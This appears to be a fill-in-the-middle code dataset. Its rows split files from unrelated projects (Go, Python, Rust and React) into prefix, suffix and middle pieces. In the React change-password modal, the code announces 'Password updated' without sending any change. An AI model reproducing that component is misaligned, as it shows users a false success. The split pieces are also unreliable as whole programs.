file_name
stringlengths 3
137
| prefix
stringlengths 0
918k
| suffix
stringlengths 0
962k
| middle
stringlengths 0
812k
|
---|---|---|---|
global.go | package main
import (
"fmt"
"math/rand"
"os"
"os/exec"
"path/filepath"
"runtime"
"time"
"github.com/blevesearch/bleve"
"github.com/dustin/go-humanize"
jsoniter "github.com/json-iterator/go"
"github.com/siddontang/ledisdb/ledis"
)
type configGlobalStruct struct {
sourceFolder string
timeStart time.Time
execDir string
dataDir string
appInstalled bool
requestIndexing bool //необходимость запустить переиндексацию поиска
atStartOpenBrowser bool
atStartCheckNewNotes bool
atStartShowConsole bool
postEditor string
cmdPort string
cmdPortable bool
cmdServerMode bool
}
var configGlobal (configGlobalStruct)
var ConfigDB, NoteBookDB, NoteDB, TagsDB, FavoritesDB *ledis.DB //nolint:golint
type SearchService struct {
index bleve.Index
batch *bleve.Batch
}
var ss SearchService
var searchStatus struct {
Status string `json:"status"`
NotesTotal int `json:"notesTotal"`
NotesCurrent int `json:"notesCurrent"`
}
var optimizationStatus struct {
Status string `json:"status"`
NotesTotal int `json:"notesTotal"`
NotesCurrent int `json:"notesCurrent"`
}
type SearchContent struct {
UUID string `json:"uuid"`
Title string `json:"title"`
Cells []ContentCellsType `json:"cells"`
}
type SearchResult struct {
Title string `json:"title"`
UUID string `json:"uuid"`
NoteBookUUID string `json:"NoteBookUUID"`
}
var json = jsoniter.ConfigCompatibleWithStandardLibrary
type NoteBookType struct {
UUID string
Name string
Notes map[string]int64
NotesCount int
}
type NoteBookTypeAPI struct {
UUID string `json:"uuid"`
Name string `json:"name"`
NotesCount int `json:"notesCount"`
}
type NoteType struct {
CreatedAt int32 `json:"created_at"`
UpdatedAt int32 `json:"updated_at"`
Tags []string `json:"tags"`
Title string `json:"title"`
UUID string `json:"uuid"`
URL string `json:"url_src"`
NoteBookUUID string
SearchIndex bool
}
type NoteTypeWithContentAPI struct {
CreatedAt int32 `json:"created_at"`
UpdatedAt int32 `json:"updated_at"`
Tags []string `json:"tags"`
Title string `json:"title"`
UUID string `json:"uuid"`
URL string `json:"url_src"`
NoteBookUUID string
SearchIndex bool
Content string `json:"content"`
ContentType string `json:"type"`
Favorites bool `json:"favorites"`
}
type NoteTypeAPI struct {
UpdatedAt int32 `json:"updated_at"`
Title string `json:"title"`
UUID string `json:"uuid"`
NoteBookUUID string `json:"NoteBookUUID"`
}
var NoteBook = make(map[string]NoteBookType)
var TagsCloud = make(map[string][]string)
type TagsListStruct struct {
Count int `json:"count"`
Name string `json:"name"`
URL string `json:"url"`
}
type ContentCellsType struct {
Type string `json:"type"`
Data string `json:"data"`
}
type FilesForIndexType struct {
Patch string
UUID string
}
var FilesForIndex = []FilesForIndexType{}
var systrayProcess *exec.Cmd
func BytesToString(data []byte) string {
return string(data)
}
func RandStringB | nst letterBytes = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
b := make([]byte, n)
for i := range b {
b[i] = letterBytes[rand.Intn(len(letterBytes))]
}
return string(b)
}
func MemStat() {
var mem runtime.MemStats
runtime.ReadMemStats(&mem)
//fmt.Printf("\nAlloc = %v\nTotalAlloc = %v\nSys = %v\nNumGC = %v\n\n", humanize.Bytes(mem.Alloc), humanize.Bytes(mem.TotalAlloc), humanize.Bytes(mem.Sys), mem.NumGC)
fmt.Printf("\nSys = %v\n\n", humanize.Bytes(mem.Sys))
}
//https://www.codesd.com/item/golang-how-to-get-the-total-size-of-the-directory.html
func DirSize2(path string) (int64, error) {
var size int64
adjSize := func(_ string, info os.FileInfo, err error) error {
if !info.IsDir() {
size += info.Size()
}
return err
}
err := filepath.Walk(path, adjSize)
return size, err
}
// https://codereview.stackexchange.com/questions/60074/in-array-in-go
func inArray(val string, array []string) (exists bool) {
exists = false
for _, v := range array {
if val == v {
exists = true
return
}
}
return
}
| ytes(n int) string {
co |
utils.py | from threading import Event
class Message:
def __init__(self, timeout=10):
self._ready = Event()
self._timeout = timeout
self._response = None
@property
def result(self):
received = self._ready.wait(timeout=self._timeout)
if not received:
raise MqttError("CONNECTION", "No Response Received")
if not self._response['ok']:
raise MqttError(self._response['errorCode'], self._response['error'])
return self._response['data']
@result.setter
def result(self, dato):
self._response = dato
self._ready.set()
def __len__(self): |
def __iter__(self):
return self.result.__iter__()
def __contains__(self, key):
return key in self.result
class MqttError(Exception):
def __init__(self, error_code, description):
self.error_code = error_code
self.description = description | return len(self.result)
def __getitem__(self, key):
return self.result[key] |
main.rs | // Copyright 2018 Alex Crawford
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
extern crate actix;
extern crate actix_web;
extern crate failure;
extern crate graph_builder;
#[macro_use]
extern crate log;
extern crate structopt;
extern crate tempfile;
use crate::failure::ResultExt;
use actix_web::{App, HttpServer};
use cincinnati::plugins::prelude::*;
use commons::metrics::{self, HasRegistry};
use failure::Error;
use graph_builder::{config, graph, graph::RwLock, status};
use std::sync::Arc;
use std::thread;
/// Common prefix for graph-builder metrics.
pub static METRICS_PREFIX: &str = "cincinnati_gb";
fn main() -> Result<(), Error> {
let sys = actix::System::new("graph-builder");
let settings = config::AppSettings::assemble().context("could not assemble AppSettings")?;
env_logger::Builder::from_default_env()
.filter(Some(module_path!()), settings.verbosity)
.init();
debug!("application settings:\n{:#?}", settings);
let plugins: Vec<BoxedPlugin> = if settings.disable_quay_api_metadata {
Default::default()
} else {
// TODO(lucab): drop this when plugins are configurable.
use cincinnati::plugins::internal::edge_add_remove::{
EdgeAddRemovePlugin, DEFAULT_REMOVE_ALL_EDGES_VALUE,
};
use cincinnati::plugins::internal::metadata_fetch_quay::{
QuayMetadataFetchPlugin, DEFAULT_QUAY_LABEL_FILTER, DEFAULT_QUAY_MANIFESTREF_KEY,
};
use cincinnati::plugins::internal::node_remove::NodeRemovePlugin;
use quay::v1::DEFAULT_API_BASE;
// TODO(steveeJ): actually make this vec configurable
new_plugins!(
InternalPluginWrapper(
// TODO(lucab): source options from plugins config.
QuayMetadataFetchPlugin::try_new(
settings.repository.clone(),
DEFAULT_QUAY_LABEL_FILTER.to_string(),
DEFAULT_QUAY_MANIFESTREF_KEY.to_string(),
None,
DEFAULT_API_BASE.to_string(),
)
.context("could not initialize the QuayMetadataPlugin")?,
),
InternalPluginWrapper(NodeRemovePlugin {
key_prefix: DEFAULT_QUAY_LABEL_FILTER.to_string(),
}),
InternalPluginWrapper(EdgeAddRemovePlugin {
key_prefix: DEFAULT_QUAY_LABEL_FILTER.to_string(),
remove_all_edges_value: DEFAULT_REMOVE_ALL_EDGES_VALUE.to_string(),
})
)
};
let registry: prometheus::Registry = metrics::new_registry(Some(METRICS_PREFIX.to_string()))?;
let service_addr = (settings.address, settings.port);
let status_addr = (settings.status_address, settings.status_port);
let app_prefix = settings.path_prefix.clone();
// Shared state.
let state = {
let json_graph = Arc::new(RwLock::new(String::new()));
let live = Arc::new(RwLock::new(false));
let ready = Arc::new(RwLock::new(false));
graph::State::new(
json_graph.clone(),
settings.mandatory_client_parameters.clone(),
live.clone(),
ready.clone(),
Box::leak(Box::new(plugins)),
Box::leak(Box::new(registry)),
)
};
// Graph scraper
let graph_state = state.clone();
thread::spawn(move || graph::run(&settings, &graph_state));
// Status service.
graph::register_metrics(state.registry())?;
let status_state = state.clone();
HttpServer::new(move || {
App::new()
.register_data(actix_web::web::Data::new(status_state.clone()))
.service(
actix_web::web::resource("/liveness")
.route(actix_web::web::get().to(status::serve_liveness)),
)
.service(
actix_web::web::resource("/metrics")
.route(actix_web::web::get().to(metrics::serve::<graph::State>)),
)
.service(
actix_web::web::resource("/readiness")
.route(actix_web::web::get().to(status::serve_readiness)),
)
})
.bind(status_addr)?
.start();
// Main service.
let main_state = state.clone();
HttpServer::new(move || {
App::new()
.register_data(actix_web::web::Data::new(main_state.clone()))
.service(
actix_web::web::resource(&format!("{}/v1/graph", app_prefix.clone()))
.route(actix_web::web::get().to(graph::index)),
)
})
.bind(service_addr)?
.start();
let _ = sys.run();
Ok(())
}
#[cfg(test)]
mod tests {
use super::*;
use crate::graph::State;
use actix_web::test::TestRequest;
use commons::metrics::HasRegistry;
use commons::testing;
use failure::{bail, Fallible};
use parking_lot::RwLock;
use prometheus::Registry;
use std::collections::HashSet;
use std::sync::Arc;
fn mock_state() -> State {
let json_graph = Arc::new(RwLock::new(String::new()));
let live = Arc::new(RwLock::new(false));
let ready = Arc::new(RwLock::new(false));
let plugins = Box::leak(Box::new([]));
let registry: &'static Registry = Box::leak(Box::new(
metrics::new_registry(Some(METRICS_PREFIX.to_string())).unwrap(),
));
| HashSet::new(),
live.clone(),
ready.clone(),
plugins,
registry,
)
}
#[test]
fn serve_metrics_basic() -> Fallible<()> {
let mut rt = testing::init_runtime()?;
let state = mock_state();
let registry = <dyn HasRegistry>::registry(&state);
graph::register_metrics(registry)?;
testing::dummy_gauge(registry, 42.0)?;
let http_req = TestRequest::default().data(state).to_http_request();
let metrics_call = metrics::serve::<graph::State>(http_req);
let resp = rt.block_on(metrics_call)?;
assert_eq!(resp.status(), 200);
if let actix_web::body::ResponseBody::Body(body) = resp.body() {
if let actix_web::body::Body::Bytes(bytes) = body {
assert!(!bytes.is_empty());
println!("{:?}", std::str::from_utf8(bytes.as_ref()));
assert!(
twoway::find_bytes(bytes.as_ref(), b"cincinnati_gb_dummy_gauge 42\n").is_some()
);
} else {
bail!("expected Body")
}
} else {
bail!("expected bytes in body")
};
Ok(())
}
} | State::new(
json_graph.clone(), |
error.rs | use std::{error::Error, fmt, net::SocketAddr};
/// An Error type specifically related to the Naia Server Socket
/// This is under construction and needs to be cleaned up
#[derive(Debug)]
pub enum NaiaServerSocketError {
/// A wrapped error from another library/codebase
Wrapped(Box<dyn Error>),
/// An error indicating an inability to send to the given address
SendError(SocketAddr),
}
impl fmt::Display for NaiaServerSocketError {
fn fmt(&self, f: &mut fmt::Formatter) -> Result<(), fmt::Error> |
}
impl Error for NaiaServerSocketError {}
| {
match self {
NaiaServerSocketError::Wrapped(boxed_err) => fmt::Display::fmt(boxed_err.as_ref(), f),
NaiaServerSocketError::SendError(addr) => fmt::Display::fmt(&addr, f),
}
} |
change-password.js | import React, { Component } from "react";
import PropTypes from "prop-types";
import { connect } from "react-redux";
import { analytics, validators } from "additional";
import { appOperations } from "modules/app";
import ErrorFieldTooltip from "components/ui/error_field_tooltip";
import { info } from "modules/notifications";
import { ProfileFullPath } from "routes";
import Modal from "components/modal";
class ChangePassword extends Component {
constructor(props) {
super(props);
this.closeModal = this.closeModal.bind(this);
this.changePassword = this.changePassword.bind(this);
this.state = {
confPasswordError: null,
newPasswordError: null,
oldPasswordError: null,
};
analytics.pageview(`${ProfileFullPath}/change-password`, "Change Password");
}
closeModal() {
const { dispatch } = this.props;
analytics.event({ action: "Change Password Modal", category: "Profile", label: "Back" });
dispatch(appOperations.closeModal());
}
async changePassword(event) {
event.preventDefault();
const { dispatch } = this.props;
analytics.event({ action: "Change Password Modal", category: "Profile", label: "Change" });
const oldPassword = this.old_password.value.trim();
const newPassword = this.new_password.value.trim();
const confPassword = this.conf_new_password.value.trim();
const oldPasswordError = validators.validatePass(oldPassword);
const newPasswordError =
validators.validatePass(newPassword) ||
validators.validatePassDiff(oldPassword, newPassword);
const confPasswordError =
validators.validatePass(confPassword) || | validators.validatePassMismatch(newPassword, confPassword);
if (oldPasswordError || newPasswordError || confPasswordError) {
this.setState({
confPasswordError,
newPasswordError,
oldPasswordError,
});
return;
}
this.setState({
confPasswordError,
newPasswordError,
oldPasswordError,
});
dispatch(info({ message: "Password updated" }));
this.closeModal();
}
render() {
return (
<Modal title="Change password" onClose={this.closeModal}>
<form onSubmit={this.changePassword}>
<div className="modal-body">
<div className="row form-row">
<div className="col-xs-12">
<div className="form-label">
<label htmlFor="old_password">
Old password
</label>
</div>
</div>
<div className="col-xs-12">
<input
id="old_password"
className={`form-text ${this.state.oldPasswordError ? "form-text__error" : ""}`}
name="old_password"
placeholder="●●●●●●"
ref={(input) => {
this.old_password = input;
}}
onChange={() => this.setState({ oldPasswordError: null })}
type="password"
/>
<ErrorFieldTooltip text={this.state.oldPasswordError} />
</div>
</div>
<div className="row form-row">
<div className="col-xs-12">
<div className="form-label">
<label htmlFor="new_password">
New password
</label>
</div>
</div>
<div className="col-xs-12">
<input
id="new_password"
className={`form-text ${this.state.newPasswordError ? "form-text__error" : ""}`}
name="new_password"
placeholder="●●●●●●"
ref={(input) => {
this.new_password = input;
}}
onChange={() => this.setState({ newPasswordError: null })}
type="password"
/>
<ErrorFieldTooltip text={this.state.newPasswordError} />
</div>
</div>
<div className="row form-row">
<div className="col-xs-12">
<div className="form-label">
<label htmlFor="conf_new_password">
Confirm password
</label>
</div>
</div>
<div className="col-xs-12">
<input
id="conf_new_password"
className={`form-text ${this.state.confPasswordError ? "form-text__error" : ""}`}
name="conf_new_password"
placeholder="●●●●●●"
ref={(input) => {
this.conf_new_password = input;
}}
onChange={() => this.setState({ confPasswordError: null })}
type="password"
/>
<ErrorFieldTooltip text={this.state.confPasswordError} />
</div>
</div>
</div>
<div className="modal-footer">
<div className="row">
<div className="col-xs-12 text-right">
<button
className="button button__link text-uppercase"
type="button"
onClick={this.closeModal}
>
Back
</button>
<button
className="button button__orange button__create"
type="submit"
>
CHANGE
</button>
</div>
</div>
</div>
</form>
</Modal>
);
}
}
ChangePassword.propTypes = {
dispatch: PropTypes.func.isRequired,
};
export default connect()(ChangePassword); | |
pregame.py | from collections import defaultdict, Counter
from datetime import datetime, timedelta
import threading
import itertools
import random
import time
import math
import re
from src.containers import UserDict, UserSet
from src.decorators import COMMANDS, command, event_listener, handle_error
from src.functions import get_players
from src.warnings import decrement_stasis
from src.messages import messages
from src.events import Event
from src.cats import Wolfchat, All
from src import channels
import botconfig
WAIT_LOCK = threading.RLock()
WAIT_TOKENS = 0
WAIT_LAST = 0
LAST_START = UserDict() # type: UserDict[users.User, List[datetime, int]]
LAST_WAIT = UserDict() # type: UserDict[users.User, datetime]
START_VOTES = UserSet() # type: UserSet[users.User]
RESTART_TRIES = 0 # type: int
MAX_RETRIES = 3 # constant: not a setting
@command("wait", playing=True, phases=("join",))
def wait(var, wrapper, message):
"""Increase the wait time until !start can be used."""
if wrapper.target is not channels.Main:
return
pl = get_players()
with WAIT_LOCK:
global WAIT_TOKENS, WAIT_LAST
wait_check_time = time.time()
WAIT_TOKENS += (wait_check_time - WAIT_LAST) / var.WAIT_TB_DELAY
WAIT_LAST = wait_check_time
WAIT_TOKENS = min(WAIT_TOKENS, var.WAIT_TB_BURST)
now = datetime.now()
if ((LAST_WAIT and wrapper.source in LAST_WAIT and LAST_WAIT[wrapper.source] +
timedelta(seconds=var.WAIT_RATE_LIMIT) > now) or WAIT_TOKENS < 1):
wrapper.pm(messages["command_ratelimited"])
return
LAST_WAIT[wrapper.source] = now
WAIT_TOKENS -= 1
if now > var.CAN_START_TIME:
var.CAN_START_TIME = now + timedelta(seconds=var.EXTRA_WAIT)
else:
var.CAN_START_TIME += timedelta(seconds=var.EXTRA_WAIT)
wrapper.send(messages["wait_time_increase"].format(wrapper.source, var.EXTRA_WAIT))
@command("fwait", flag="w", phases=("join",))
def fwait(var, wrapper, message):
"""Force an increase (or decrease) in wait time. Can be used with a number of seconds to wait."""
pl = get_players()
msg = re.split(" +", message.strip(), 1)[0]
if msg and (msg.isdigit() or (msg[0] == "-" and msg[1:].isdigit())):
extra = int(msg)
else:
extra = var.EXTRA_WAIT
now = datetime.now()
extra = max(-900, min(900, extra))
if now > var.CAN_START_TIME:
var.CAN_START_TIME = now + timedelta(seconds=extra)
else:
var.CAN_START_TIME += timedelta(seconds=extra)
if extra >= 0:
wrapper.send(messages["forced_wait_time_increase"].format(wrapper.source, abs(extra)))
else:
wrapper.send(messages["forced_wait_time_decrease"].format(wrapper.source, abs(extra)))
@command("start", phases=("none", "join"))
def start_cmd(var, wrapper, message):
"""Start a game of Werewolf."""
if wrapper.target is channels.Main:
start(var, wrapper)
@command("fstart", flag="S", phases=("join",))
def fstart(var, wrapper, message):
"""Force the game to start immediately."""
channels.Main.send(messages["fstart_success"].format(wrapper.source))
wrapper.target = channels.Main
start(var, wrapper, forced=True)
@command("retract", phases=("day", "join"))
def retract(var, wrapper, message):
"""Take back your vote during the day (for whom to lynch)."""
if wrapper.source not in get_players() or wrapper.source in var.DISCONNECTED:
return
with var.GRAVEYARD_LOCK, var.WARNING_LOCK:
if var.PHASE == "join":
if wrapper.source not in START_VOTES:
wrapper.pm(messages["start_novote"])
else:
START_VOTES.discard(wrapper.source)
wrapper.send(messages["start_retract"].format(wrapper.source))
if not START_VOTES:
var.TIMERS["start_votes"][0].cancel()
del var.TIMERS["start_votes"]
@event_listener("del_player")
def on_del_player(evt, var, player, all_roles, death_triggers):
if var.PHASE == "join":
with var.WARNING_LOCK:
START_VOTES.discard(player)
# Cancel the start vote timer if there are no votes left
if not START_VOTES and "start_votes" in var.TIMERS:
var.TIMERS["start_votes"][0].cancel()
del var.TIMERS["start_votes"]
def start(var, wrapper, *, forced=False, restart=""):
if (not forced and LAST_START and wrapper.source in LAST_START and
LAST_START[wrapper.source][0] + timedelta(seconds=var.START_RATE_LIMIT) >
datetime.now() and not restart):
LAST_START[wrapper.source][1] += 1
wrapper.source.send(messages["command_ratelimited"])
return
if restart:
global RESTART_TRIES
RESTART_TRIES += 1
if RESTART_TRIES > MAX_RETRIES:
from src.wolfgame import stop_game
stop_game(var, abort=True)
return
if not restart:
LAST_START[wrapper.source] = [datetime.now(), 1]
villagers = get_players()
vils = set(get_players())
if not restart:
if var.PHASE == "none":
wrapper.source.send(messages["no_game_running"])
return
if var.PHASE != "join":
wrapper.source.send(messages["werewolf_already_running"])
return
if wrapper.source not in villagers and not forced:
return
now = datetime.now()
var.GAME_START_TIME = now # Only used for the idler checker
dur = int((var.CAN_START_TIME - now).total_seconds())
if dur > 0 and not forced:
wrapper.send(messages["please_wait"].format(dur))
return
if len(villagers) < var.MIN_PLAYERS:
wrapper.send(messages["not_enough_players"].format(wrapper.source, var.MIN_PLAYERS))
return
if len(villagers) > var.MAX_PLAYERS:
wrapper.send.send(messages["max_players"].format(wrapper.source, var.MAX_PLAYERS))
return
with var.WARNING_LOCK:
if not forced and wrapper.source in START_VOTES:
wrapper.pm(messages["start_already_voted"])
return
start_votes_required = min(math.ceil(len(villagers) * var.START_VOTES_SCALE), var.START_VOTES_MAX)
if not forced and len(START_VOTES) < start_votes_required:
# If there's only one more vote required, start the game immediately.
# Checked here to make sure that a player that has already voted can't
# vote again for the final start.
if len(START_VOTES) < start_votes_required - 1:
START_VOTES.add(wrapper.source)
remaining_votes = start_votes_required - len(START_VOTES)
wrapper.send(messages["start_voted"].format(wrapper.source, remaining_votes))
# If this was the first vote
if len(START_VOTES) == 1:
t = threading.Timer(60, expire_start_votes, (var, wrapper.target))
var.TIMERS["start_votes"] = (t, time.time(), 60)
t.daemon = True
t.start()
return
if not var.FGAMED:
votes = {} #key = gamemode, not hostmask
for gamemode in var.GAMEMODE_VOTES.values():
if len(villagers) >= var.GAME_MODES[gamemode][1] and len(villagers) <= var.GAME_MODES[gamemode][2]:
votes[gamemode] = votes.get(gamemode, 0) + 1
voted = [gamemode for gamemode in votes if votes[gamemode] == max(votes.values()) and votes[gamemode] >= len(villagers)/2]
if voted:
from src.wolfgame import cgamemode
cgamemode(random.choice(voted))
else:
possiblegamemodes = []
numvotes = 0
for gamemode, num in votes.items():
if len(villagers) < var.GAME_MODES[gamemode][1] or len(villagers) > var.GAME_MODES[gamemode][2] or var.GAME_MODES[gamemode][3] == 0:
continue
possiblegamemodes += [gamemode] * num
numvotes += num
if len(villagers) - numvotes > 0:
possiblegamemodes += [None] * ((len(villagers) - numvotes) // 2)
# check if we go with a voted mode or a random mode
gamemode = random.choice(possiblegamemodes)
if gamemode is None:
possiblegamemodes = []
for gamemode in var.GAME_MODES.keys() - var.DISABLED_GAMEMODES:
if len(villagers) >= var.GAME_MODES[gamemode][1] and len(villagers) <= var.GAME_MODES[gamemode][2] and var.GAME_MODES[gamemode][3] > 0:
possiblegamemodes += [gamemode] * var.GAME_MODES[gamemode][3]
gamemode = random.choice(possiblegamemodes)
from src.wolfgame import cgamemode
cgamemode(gamemode)
else:
from src.wolfgame import cgamemode
cgamemode(restart)
var.GAME_ID = time.time() # restart reaper timer
from src.wolfgame import chk_win_conditions # TODO: Move that into its own postgame module
event = Event("role_attribution", {"addroles": Counter()})
if event.dispatch(var, chk_win_conditions, villagers):
addroles = event.data["addroles"]
strip = lambda x: re.sub(r"\(.*\)", "", x)
lv = len(villagers)
roles = []
for num, rolelist in var.CURRENT_GAMEMODE.ROLE_GUIDE.items():
if num <= lv:
roles.extend(rolelist)
defroles = Counter(strip(x) for x in roles)
for role, count in list(defroles.items()):
if role[0] == "-":
srole = role[1:]
defroles[srole] -= count
del defroles[role]
if defroles[srole] == 0:
del defroles[srole]
if not defroles:
wrapper.send(messages["no_settings_defined"].format(wrapper.source, lv))
return
for role, num in defroles.items():
addroles[role] = max(addroles.get(role, num), len(var.FORCE_ROLES.get(role, ())))
if sum([addroles[r] for r in addroles if r not in var.CURRENT_GAMEMODE.SECONDARY_ROLES]) > lv:
wrapper.send(messages["too_many_roles"])
return
for role in All:
addroles.setdefault(role, 0)
else:
addroles = event.data["addroles"]
# convert roleset aliases into the appropriate roles
possible_rolesets = [Counter()]
roleset_roles = defaultdict(int)
var.CURRENT_GAMEMODE.ACTIVE_ROLE_SETS = {}
for role, amt in list(addroles.items()):
# not a roleset? add a fixed amount of them
if role not in var.CURRENT_GAMEMODE.ROLE_SETS:
for pr in possible_rolesets:
pr[role] += amt
continue
# if a roleset, ensure we don't try to expose the roleset name in !stats or future attribution
# but do keep track of the sets in use so we can have !stats reflect proper information
var.CURRENT_GAMEMODE.ACTIVE_ROLE_SETS[role] = amt
del addroles[role]
# init !stats with all 0s so that it can number things properly; the keys need to exist in the Counter
# across every possible roleset so that !stats works right
rs = Counter(var.CURRENT_GAMEMODE.ROLE_SETS[role])
for r in rs:
for pr in possible_rolesets:
pr[r] += 0
toadd = random.sample(list(rs.elements()), amt)
for r in toadd:
addroles[r] += 1
roleset_roles[r] += 1
add_rolesets = []
temp_rolesets = []
for c in itertools.combinations(rs.elements(), amt):
add_rolesets.append(Counter(c))
for pr in possible_rolesets:
for ar in add_rolesets:
temp = Counter(pr)
temp.update(ar)
temp_rolesets.append(temp)
possible_rolesets = temp_rolesets
if var.ORIGINAL_SETTINGS and not restart: # Custom settings
need_reset = True
wvs = sum(addroles[r] for r in Wolfchat)
if len(villagers) < (sum(addroles.values()) - sum(addroles[r] for r in var.CURRENT_GAMEMODE.SECONDARY_ROLES)):
wrapper.send(messages["too_few_players_custom"])
elif not wvs and var.CURRENT_GAMEMODE.name != "villagergame":
wrapper.send(messages["need_one_wolf"])
elif wvs > (len(villagers) / 2):
wrapper.send(messages["too_many_wolves"])
else:
need_reset = False
if need_reset:
from src.wolfgame import reset_settings
reset_settings()
wrapper.send(messages["default_reset"])
var.PHASE = "join"
return
if var.ADMIN_TO_PING is not None and not restart:
for decor in (COMMANDS["join"] + COMMANDS["start"]):
decor(_command_disabled)
var.ROLES.clear()
var.MAIN_ROLES.clear()
var.NIGHT_COUNT = 0
var.DAY_COUNT = 0
var.FINAL_ROLES.clear()
var.EXTRA_WOLVES = 0
var.DEADCHAT_PLAYERS.clear()
var.SPECTATING_WOLFCHAT.clear()
var.SPECTATING_DEADCHAT.clear()
for role in All:
var.ROLES[role] = UserSet()
var.ROLES[var.DEFAULT_ROLE] = UserSet()
for role, ps in var.FORCE_ROLES.items():
if role not in var.CURRENT_GAMEMODE.SECONDARY_ROLES.keys():
vils.difference_update(ps)
for role, count in addroles.items():
if role in var.CURRENT_GAMEMODE.SECONDARY_ROLES:
var.ROLES[role] = (None,) * count
continue # We deal with those later, see below
to_add = set()
if role in var.FORCE_ROLES:
if len(var.FORCE_ROLES[role]) > count:
channels.Main.send(messages["error_frole_too_many"].format(role))
return
for user in var.FORCE_ROLES[role]:
# If multiple main roles were forced, only first one is put in MAIN_ROLES
if not user in var.MAIN_ROLES:
var.MAIN_ROLES[user] = role
var.ORIGINAL_MAIN_ROLES[user] = role
to_add.add(user)
count -= 1
selected = random.sample(vils, count)
for x in selected:
var.MAIN_ROLES[x] = role
var.ORIGINAL_MAIN_ROLES[x] = role
vils.remove(x)
var.ROLES[role].update(selected)
var.ROLES[role].update(to_add)
var.ROLES[var.DEFAULT_ROLE].update(vils)
for x in vils:
var.MAIN_ROLES[x] = var.DEFAULT_ROLE
var.ORIGINAL_MAIN_ROLES[x] = var.DEFAULT_ROLE
if vils:
for pr in possible_rolesets:
pr[var.DEFAULT_ROLE] += len(vils)
# Collapse possible_rolesets into var.ROLE_STATS
# which is a FrozenSet[FrozenSet[Tuple[str, int]]]
possible_rolesets_set = set()
event = Event("reconfigure_stats", {"new": []})
for pr in possible_rolesets:
event.data["new"] = [pr]
event.dispatch(var, pr, "start")
for v in event.data["new"]:
if min(v.values()) >= 0:
possible_rolesets_set.add(frozenset(v.items()))
var.ROLE_STATS = frozenset(possible_rolesets_set)
# Now for the secondary roles
for role, dfn in var.CURRENT_GAMEMODE.SECONDARY_ROLES.items():
count = len(var.ROLES[role])
var.ROLES[role] = UserSet()
if role in var.FORCE_ROLES:
ps = var.FORCE_ROLES[role]
var.ROLES[role].update(ps)
count -= len(ps)
# Don't do anything further if this secondary role was forced on enough players already
if count <= 0:
continue
possible = get_players(dfn)
if len(possible) < count:
wrapper.send(messages["not_enough_targets"].format(role))
if var.ORIGINAL_SETTINGS:
from src.wolfgame import reset_settings
var.ROLES.clear()
var.ROLES["person"] = UserSet(var.ALL_PLAYERS)
reset_settings()
wrapper.send(messages["default_reset"])
var.PHASE = "join"
return
else:
wrapper.send(messages["role_skipped"])
continue
var.ROLES[role].update(x for x in random.sample(possible, count))
with var.WARNING_LOCK: # cancel timers
for name in ("join", "join_pinger", "start_votes"):
if name in var.TIMERS:
var.TIMERS[name][0].cancel()
del var.TIMERS[name]
var.LAST_STATS = None
var.LAST_TIME = None
for role, players in var.ROLES.items():
for player in players:
evt = Event("new_role", {"messages": [], "role": role, "in_wolfchat": False}, inherit_from=None)
evt.dispatch(var, player, None)
if not restart:
gamemode = var.CURRENT_GAMEMODE.name
if gamemode == "villagergame":
gamemode = "default"
# Alert the players to option changes they may not be aware of
# All keys begin with gso_* (game start options)
options = []
if var.ORIGINAL_SETTINGS.get("ROLE_REVEAL") is not None:
# Keys used here: gso_rr_on, gso_rr_team, gso_rr_off
options.append(messages["gso_rr_{0}".format(var.ROLE_REVEAL)])
if var.ORIGINAL_SETTINGS.get("STATS_TYPE") is not None:
# Keys used here: gso_st_default, gso_st_accurate, gso_st_team, gso_st_disabled
options.append(messages["gso_st_{0}".format(var.STATS_TYPE)])
if var.ORIGINAL_SETTINGS.get("ABSTAIN_ENABLED") is not None or var.ORIGINAL_SETTINGS.get("LIMIT_ABSTAIN") is not None:
if var.ABSTAIN_ENABLED and var.LIMIT_ABSTAIN:
options.append(messages["gso_abs_rest"])
elif var.ABSTAIN_ENABLED:
options.append(messages["gso_abs_unrest"])
else:
options.append(messages["gso_abs_none"])
key = "welcome_simple"
if options:
key = "welcome_options"
wrapper.send(messages[key].format(villagers, gamemode, options))
wrapper.target.mode("+m")
var.ORIGINAL_ROLES.clear()
for role, players in var.ROLES.items():
var.ORIGINAL_ROLES[role] = players.copy()
var.DAY_TIMEDELTA = timedelta(0)
var.NIGHT_TIMEDELTA = timedelta(0)
var.DAY_START_TIME = datetime.now()
var.NIGHT_START_TIME = datetime.now()
var.LAST_PING = None
if restart:
var.PHASE = "join" # allow transition_* to run properly if game was restarted on first night
if not var.START_WITH_DAY:
from src.wolfgame import transition_night
var.GAMEPHASE = "day" # gamephase needs to be the thing we're transitioning from
transition_night()
else:
from src.wolfgame import transition_day
var.FIRST_DAY = True
var.GAMEPHASE = "night"
transition_day()
decrement_stasis()
if not (botconfig.DEBUG_MODE and var.DISABLE_DEBUG_MODE_REAPER):
# DEATH TO IDLERS!
from src.wolfgame import reaper
reapertimer = threading.Thread(None, reaper, args=(wrapper.client, var.GAME_ID))
reapertimer.daemon = True
reapertimer.start()
def _command_disabled(var, wrapper, message):
wrapper.send(messages["command_disabled_admin"])
@handle_error
def expire_start_votes(var, channel):
# Should never happen as the timer is removed on game start, but just to be safe
|
@event_listener("reset")
def on_reset(evt, var):
global MAX_RETRIES, WAIT_TOKENS, WAIT_LAST
LAST_START.clear()
LAST_WAIT.clear()
START_VOTES.clear()
MAX_RETRIES = 0
WAIT_TOKENS = 0
WAIT_LAST = 0
| if var.PHASE != "join":
return
with var.WARNING_LOCK:
START_VOTES.clear()
channel.send(messages["start_expired"]) |
vtgate_test.go | // Copyright 2012, Google Inc. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
package vtgate
import (
"encoding/hex"
"fmt"
"math"
"reflect"
"strings"
"testing"
"github.com/golang/protobuf/proto"
"github.com/youtube/vitess/go/sqltypes"
"github.com/youtube/vitess/go/vt/discovery"
"github.com/youtube/vitess/go/vt/key"
"github.com/youtube/vitess/go/vt/tabletserver/querytypes"
"github.com/youtube/vitess/go/vt/tabletserver/sandboxconn"
"github.com/youtube/vitess/go/vt/tabletserver/tabletconn"
"github.com/youtube/vitess/go/vt/topo"
